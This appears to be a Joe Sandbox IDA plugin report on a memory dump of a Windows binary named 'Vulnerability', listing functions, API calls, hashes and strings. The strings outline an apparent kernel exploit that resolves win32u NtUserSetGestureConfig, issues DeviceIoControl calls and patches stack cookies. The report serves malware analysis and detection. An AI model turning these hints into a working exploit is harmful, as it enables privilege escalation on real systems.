Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
API String ID: 2058718191-1835519504
Opcode ID: 49e05e6e27818643180f4c41f14648222a82f7cdd346229aee826967f148f0fc
Instruction ID: 9a25d1902b9cd23d3e9bc154f59bf8d09846a90006a70e0f359ac5f33e72251c
Opcode Fuzzy Hash: 49e05e6e27818643180f4c41f14648222a82f7cdd346229aee826967f148f0fc
Instruction Fuzzy Hash: 6B518237B38B4299EB41AB61E4502A9B3B0FB58788F844236DD4D27758DF3DD129C760

Function 00007FF7738EAA30 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 122libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EAA6F
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EAA97
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EAAD1
DeviceIoControl.KERNEL32 ref: 00007FF7738EAB5B
DeviceIoControl.KERNEL32 ref: 00007FF7738EAC0D

Strings

0, xrefs: 00007FF7738EABC4
NtUserSetGestureConfig, xrefs: 00007FF7738EAAC7
[-] Failed to load win32u.dll, xrefs: 00007FF7738EAA7A
[-] Failed to get export win32u.NtUserSetGestureConfig, xrefs: 00007FF7738EAADF
win32u.dll, xrefs: 00007FF7738EAA68

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
API String ID: 2058718191-1835519504
Opcode ID: e56c557f4cb72457ffedcb1744ed334bc5d3eec3eedd5975bbbc8a90c62d70b0
Instruction ID: fa2fde87eee0f4c69121dc3ff1d6e573eae053d08605dfa8b83b94455a5e543a
Opcode Fuzzy Hash: e56c557f4cb72457ffedcb1744ed334bc5d3eec3eedd5975bbbc8a90c62d70b0
Instruction Fuzzy Hash: AC515F33A38B4299E7409F21E8506A9B3A4FB48788F944236DE4D27718DF3DD265C360

Function 00007FF7738EE750 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 75COMMON

Download Yara Rule

APIs

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EE79D
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EE7D6

Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561

Strings

[+] Fixing stack cookie, xrefs: 00007FF7738EE836
[+] Load config directory wasn't found, probably StackCookie not defined, fix cookie skipped, xrefs: 00007FF7738EE787
[+] StackCookie not defined, fix cookie skipped, xrefs: 00007FF7738EE7C0
[-] StackCookie already fixed!? this probably wrong, xrefs: 00007FF7738EE809

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@?good@ios_base@std@@U?$char_traits@_V01@@W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
String ID: [+] Fixing stack cookie$[+] Load config directory wasn't found, probably StackCookie not defined, fix cookie skipped$[+] StackCookie not defined, fix cookie skipped$[-] StackCookie already fixed!? this probably wrong
API String ID: 310790477-4185774449
Opcode ID: 76421350983320ce6da76d74966c43a37aff2320e7713b4787a093d58551255b
Instruction ID: 79eb2249d3c17b7981e88b0ff1971d2c86396d1ae79ca0557095a991095d5038
Opcode Fuzzy Hash: 76421350983320ce6da76d74966c43a37aff2320e7713b4787a093d58551255b
Instruction Fuzzy Hash: 82315026F79B4381EA80AB15E890068E361BF98F80FC42236D94D27714DF3EE565C730

Function 00007FF7738E1B20 Relevance: 16.7, APIs: 11, Instructions: 197COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF7738E1B68

Part of subcall function 00007FF7738E9790: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738E97CC
Part of subcall function 00007FF7738E9790: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7738E97EB
Part of subcall function 00007FF7738E9790: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738E981D
Part of subcall function 00007FF7738E9790: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738E9838
Part of subcall function 00007FF7738E9790: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738E9883

?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ.MSVCP140 ref: 00007FF7738E1B8F
?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z.MSVCP140 ref: 00007FF7738E1BA9
memset.VCRUNTIME140 ref: 00007FF7738E1C2B
?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z.MSVCP140 ref: 00007FF7738E1C4A
??Bios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738E1C5D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E1CCA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E1D25
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E1D77
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738E1E0E

Part of subcall function 00007FF7738F4108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43,?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738F4122

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E1E07

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$_invalid_parameter_noinfo_noreturn$memset$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?read@?$basic_istream@?seekg@?$basic_istream@?setstate@?$basic_ios@?tellg@?$basic_istream@Bios_base@std@@Concurrency::cancel_current_taskD@std@@@1@_Init@?$basic_streambuf@Mbstatet@@@2@V12@V12@_V?$basic_streambuf@V?$fpos@malloc
String ID:
API String ID: 853152473-0
Opcode ID: d155e4fa32cb25b87424030fbd96bb5612ec5f3f14f6f8518e1b0f186dfb07eb
Instruction ID: 55b1340b0476cece407e94265cef48a1042992128702bad47c2102d2f49eb65d
Opcode Fuzzy Hash: d155e4fa32cb25b87424030fbd96bb5612ec5f3f14f6f8518e1b0f186dfb07eb
Instruction Fuzzy Hash: 3971E423B78A8241EA50EB25E4443BDE361EB95BD0F845331DA9D22AD6DF3ED494C330

Function 00007FF7738EA7C0 Relevance: 16.7, APIs: 11, Instructions: 174COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA839
?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA859
?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA869
?getloc@ios_base@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7738EA894

Part of subcall function 00007FF7738ECAF0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF7738ECB1D
Part of subcall function 00007FF7738ECAF0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF7738ECB37
Part of subcall function 00007FF7738ECAF0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF7738ECB69
Part of subcall function 00007FF7738ECAF0: ?_Getcat@?$ctype@_W@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF7738ECB94
Part of subcall function 00007FF7738ECAF0: std::_Facet_Register.LIBCPMT ref: 00007FF7738ECBAD
Part of subcall function 00007FF7738ECAF0: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF7738ECBCC

?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA906
?widen@?$ctype@_W@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF7738EA94E
?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA95C
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA9E6
?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA9ED
?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA9FA

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_Lockit@std@@W@std@@$??0_??1_?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@?uncaught_exception@std@@?widen@?$ctype@_Bid@locale@std@@D@std@@@std@@Facet_Getcat@?$ctype@_Getgloballocale@locale@std@@Locimp@12@Osfx@?$basic_ostream@_RegisterU?$char_traits@V12@V42@@Vfacet@locale@2@Vlocale@2@std::_
String ID:
API String ID: 2572325179-0
Opcode ID: 54dcea9817dc5dd54c328895e64cfbe9d62cefc45a86fb8b743e8bef97b499c3
Instruction ID: 4f8e6f10702bf3e1b89bd2fbe076adbf5f6f27bbbb6d27d5df58aa59ab04920a
Opcode Fuzzy Hash: 54dcea9817dc5dd54c328895e64cfbe9d62cefc45a86fb8b743e8bef97b499c3
Instruction Fuzzy Hash: 6A617223669A4181EBA0EF19E490239E7A0FF94F95F55C232CE8E57760CF3ED4568320

Function 00007FF7738F1280 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7738F0B10: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F0C0C

_CxxThrowException.VCRUNTIME140 ref: 00007FF7738F12D3
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7738F1330
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF7738F133E
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z.MSVCP140 ref: 00007FF7738F1311

Part of subcall function 00007FF7738EA3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA4B7

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F1363

Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561

Strings

[!!] Crash, xrefs: 00007FF7738F134D
by 0x, xrefs: 00007FF7738F131A
[!!] Crash at addr 0x, xrefs: 00007FF7738F12FB
exists, xrefs: 00007FF7738F1294

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: U?$char_traits@_W@std@@@std@@$V01@$??6?$basic_ostream@_$?good@ios_base@std@@D@std@@@std@@U?$char_traits@$??6?$basic_ostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputc@?$basic_streambuf@_?uncaught_exception@std@@ExceptionOsfx@?$basic_ostream@_ThrowV01@@V12@V21@@Vios_base@1@_invalid_parameter_noinfo_noreturn
String ID: by 0x$[!!] Crash$[!!] Crash at addr 0x$exists
API String ID: 4130559589-3783130642
Opcode ID: 64d6d70040ea94b76b8b4b3888ea386c72d250b599749e752533fb1393f8f53c
Instruction ID: 2d5e65aeb775fad35b40b908050a165c992ea117e063cd42b791ebcb6f025df5
Opcode Fuzzy Hash: 64d6d70040ea94b76b8b4b3888ea386c72d250b599749e752533fb1393f8f53c
Instruction Fuzzy Hash: 18218552A38A4791EE84FB25E8502B9E320FFA4B44FC45131D94D27655EF3EE164C730

Function 00007FF7738F0C40 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON

Download Yara Rule

APIs

__std_fs_code_page.MSVCPRT ref: 00007FF7738F0C9F

Part of subcall function 00007FF7738F3948: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF7738F0CA4), ref: 00007FF7738F394C
Part of subcall function 00007FF7738F3948: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF7738F0CA4), ref: 00007FF7738F395B

memmove.VCRUNTIME140 ref: 00007FF7738F0D6F
memmove.VCRUNTIME140 ref: 00007FF7738F0E4F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F0E5F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F0EDD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F0F2B

Strings

", ", xrefs: 00007FF7738F0DF1
: ", xrefs: 00007FF7738F0DBB

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memmove$ApisFile___lc_codepage_func__std_fs_code_page
String ID: ", "$: "
API String ID: 3155750461-747220369
Opcode ID: fee7c37069f084fdb3fcbd432b07c9ad3f7f9eaf3580db1ef9395aa38425d06b
Instruction ID: 74949b5aed591357aad1595019420e227a4e9817261c6b0bf4585847cba12229
Opcode Fuzzy Hash: fee7c37069f084fdb3fcbd432b07c9ad3f7f9eaf3580db1ef9395aa38425d06b
Instruction Fuzzy Hash: 9F91A163B24B4289EB40EF65E4403BCE361EB58B88F804531DE5D67B99DF3AD564C360

Function 00007FF7738EEEA0 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,?,00000000,?,00007FF7738EEA7F,?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEF19
?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEF39
?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEF49
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEF96
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEFBD
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEFDE
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EF024
?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EF02B
?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EF038

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
String ID:
API String ID: 3858555242-0
Opcode ID: 6bc19da90b3a22a95d9b41eedf678c2b399e3105eb9b11cf846f221ea2204440
Instruction ID: 45e8a611fdb124b676c31509b3c62687ee3b15bb08e407185f8eddf1930267fd
Opcode Fuzzy Hash: 6bc19da90b3a22a95d9b41eedf678c2b399e3105eb9b11cf846f221ea2204440
Instruction Fuzzy Hash: CB515633669A4182EBA09F19E490238E760EF94FD1F55C632DE5E537A0CF3EE4568320

Function 00007FF7738ED590 Relevance: 13.6, APIs: 9, Instructions: 134COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738ED5FB
?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738ED61B
?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738ED62B
?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738ED678
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF7738ED6A6
?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738ED6C7
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738ED70E
?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738ED715
?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738ED722

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_D@std@@@std@@U?$char_traits@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
String ID:
API String ID: 1082002092-0
Opcode ID: 6755a856d871fba1efbdf4653af67588a1488c608911402bc09cbd1524d65175
Instruction ID: d9a98a146fbc7c2b16ccd6f11e513be0e4b8c5861dd2d1ebf01b87a048c6b9cf
Opcode Fuzzy Hash: 6755a856d871fba1efbdf4653af67588a1488c608911402bc09cbd1524d65175
Instruction Fuzzy Hash: 11517333628A4185EBA0AF09E580338E760FF94F85F598632DE4E57760CF3ED45A8360

Function 00007FF7738ED3D0 Relevance: 13.6, APIs: 9, Instructions: 131COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED435
?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED455
?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED465
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED4AC
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED4D9
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED4FA
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED540
?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED547
?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED554

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
String ID:
API String ID: 3858555242-0
Opcode ID: 3a3d278f9abfa924c7819ac86336879c49577fd7e6b5cdeb5568fe49040b45a1
Instruction ID: 054025a55437739ebdbe93145ecb16c98393fe823156abfc58ba87f9fae3d8ca
Opcode Fuzzy Hash: 3a3d278f9abfa924c7819ac86336879c49577fd7e6b5cdeb5568fe49040b45a1
